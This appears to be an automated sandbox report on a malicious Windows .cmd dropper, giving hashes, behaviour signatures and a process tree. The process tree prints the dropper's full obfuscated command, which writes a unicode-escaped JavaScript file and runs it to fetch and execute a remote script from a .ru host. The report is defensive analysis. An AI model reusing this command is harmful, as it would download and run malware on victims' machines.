Analysis

  • max time kernel
    62s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24/04/2023, 17:41

General

  • Target

    AssinaturaAutentique089.998686.95887.cmd

  • Size

    835B

  • MD5

    7e73323d8389accd3a107c75cc2ab959

  • SHA1

    9561365e1e2d7f6e3ecc838b3bacc2b5f1aa1da8

  • SHA256

    7af4b5096515aa03b9aed7972229f143b67c73f5654bdf82fdd91be90b638f6e

  • SHA512

    0750f973200c505706119234c676a96877c055cc3d90e432a56be6abc39dba10c36543a406cd9d364b3f3eebdba3395a312e9d1f80b538f581a1a6f9b7f9977c

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request (3 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class (1 IoC)
  • Suspicious use of WriteProcessMemory (4 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\AssinaturaAutentique089.998686.95887.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4740
    • C:\Windows\system32\cmd.exe
      cmd C:\Windows\system32\cmd.exe /V/D/c "md C:\GYy7OLJ\>nul 2>&1 &&s^eT RCWG=C:\GYy7OLJ\^GYy7OLJ.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0066\u0044\u0061\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0066\u0044\u0061\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0066\u0044\u0061\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0066\u0044\u0061\u002b\u0044\u0066\u0044\u0061\u002b\u0045\u0066\u0044\u0061\u002b\u0022\u002f\u002f\u0034\u0070\u0069\u0075\u0065\u0038\u002e\u0061\u0064\u006d\u0069\u006e\u0077\u0065\u0062\u0067\u0065\u0073\u0074\u0061\u006f\u002e\u0076\u006c\u0061\u0064\u0069\u006d\u0069\u0072\u002e\u0072\u0075\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!RCWG!&&ca^ll !RCWG!"
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4720
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\GYy7OLJ\GYy7OLJ.Js"
        3⤵
        • Blocklisted process makes network request
        PID:3108

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\GYy7OLJ\GYy7OLJ.Js

  • Filesize

    714B

  • MD5

    add3f002b4804beb5f6b0e0575158538

  • SHA1

    ee4b3d15b685958ab96934d900c4c34ecee65697

  • SHA256

    4838b1736d99985ac477bc06ed4339ffb8c1f1c57d585d2d7a74e7d6637efe4f

  • SHA512

    7cd47449fc7346091ec3fe8fee8c3d79a5badc41bdfceae5cd92a48409bd2a70f013992f60ba33e79b364031e4c95ebd7fe8b85e464b6c5fef092f57c6082d8b